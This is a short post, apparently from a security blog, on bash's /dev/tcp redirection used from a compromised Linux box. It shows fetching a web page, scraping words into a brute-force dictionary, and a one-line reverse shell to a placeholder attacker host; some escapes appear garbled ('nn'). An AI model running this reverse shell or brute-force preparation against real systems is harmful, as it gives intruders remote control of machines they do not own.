Will start linking some of the stuff that potentially would be interesting and useful here. Let’s start off with an alternative BASH-fu technique to initiate and listen TCP connections from a (supposedly pwned) Linux box:
Now the question will arise: when those network redirection could be helpful? First, bash can used without third party tools to grab data from the network. The example below fetch this blog main page:exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0nn" >&5 cat <&5 exec 5>&-
Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0nn" >&5 cat <&5 exec 5>&- | sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "n"
Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0
As the bash shell is very common, it can be very interesting! Just use your imagination. to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “–enable-net-redirections“.
Also, a tool to help with PDF creation/modification/analysis. Sounds promising: